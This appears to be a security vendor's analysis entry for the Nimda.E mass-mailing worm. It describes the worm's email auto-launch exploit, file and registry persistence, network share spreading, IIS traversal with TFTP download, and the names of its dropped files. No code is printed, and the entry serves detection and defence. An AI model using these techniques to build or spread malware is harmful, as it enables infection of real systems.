W32/Nimda.E@mm
Analysis
- Viral body is 57344 bytes and is prepended to EXE
files
- Virus uses various exploit and infection methods
in order to infect the potential
host -
- Malformed MIME header and IFrame exploit within
email propagation
- INDEX.HTML / DEFAULT.HTML file load insertion
- files are modified to load infectious README.EML
- SYSTEM.INI file load insertion
- EXE infection - virus prepends itself to target
files
- Network spreading - virus attempts to connect
to open shares and copy itself to these locations
- Infectious README.EML / DESKTOP.EML placed
in all folders
- IP scanning to identify IIS systems and using
malformed GET request - response uploads infectious
httpodbc.dll to the target system and executes
it
- Hiding extensions of known file types - this
aids in the launch of an executable with an inappropriate
file icon
- Malformed MIME header and IFrame exploit within
email propagation
- Virus arrives as an attachment from infected users
in a message structured such that a malformed MIME
header exploit coupled with an IFrame exploit will
cause the attachment to launch automatically when
the message is either opened or previewed in Outlook
- The message contains two parts, one being script
containing the IFrame exploit which invokes the second
part, which is mislabeled on purpose with an inappropriate
Content-Type of "audio/x-wav" - this is
done in an effort to automatically launch the attachment
commonly named "sample.exe".
- When first executed, the virus will write two files
into the Windows\Temp folder and execute one of them
- the files may be named similar to "mepF050.TMP.exe"
- the virus will also write a WININIT.INI configuration
file which will delete the files written to the Temp
folder at next Windows startup.
- Virus will write itself as "load.exe"
to the Windows\System folder, then modify the SYSTEM.INI
file to run the virus secondary to loading the shell
Explorer.exe with a parameter "-dontrunold"
- Virus modifies the registry to hide the extensions
of known file types and to not display hidden files
- if infected users attempt to modify these values
manually within the "View | Folder Options"
menu option in a folder view, the settings are reset
by the virus to continue hiding extensions and not
display hidden files
- Virus attempts to scan IP addresses in search of
a system running IIS in an effort to infect that host
- the virus uses a "Transversal Directory"
exploit in order to sends a malformed "GET httpodbc.dll"
request, which in turn triggers the target to request
the infectious httpodbc.dll from the requestor via
TFTP
- httpodbc.dll will be executed on the target system
and infect files matching these names -
Index.XXX
Default.XXX
Main.XXXWhere .XXX could be .asp, .htm or .html - virus drops a file "Readme.eml" on the target and modifies the qualifying files to load the .eml file using the HTML instruction "refresh"
-
Virus copies itself to numerous locations as the following files -
readme.nws
readme.eml
httpodbc.dll
sample.exe
Riched20.dll (in folders containing .DOC files) -
Virus modifies the registry to share all local drives C through Z - after a Windows restart, the drives would be fully shared - virus then attempts to copy itself to systems available across the network
-
Virus contains the following string -
Concept Virus(CV) V.6, Copyright(C)2001,
(This's CV, No Nimda.)
Telemetry
Detection Availability
FortiGate | |
---|---|
Extreme | |
FortiClient | |
Extended | |
FortiMail | |
Extended | |
FortiSandbox | |
Extended | |
FortiWeb | |
Extended | |
Web Application Firewall | |
Extended | |
FortiIsolator | |
Extended | |
FortiDeceptor | |
Extended | |
FortiEDR |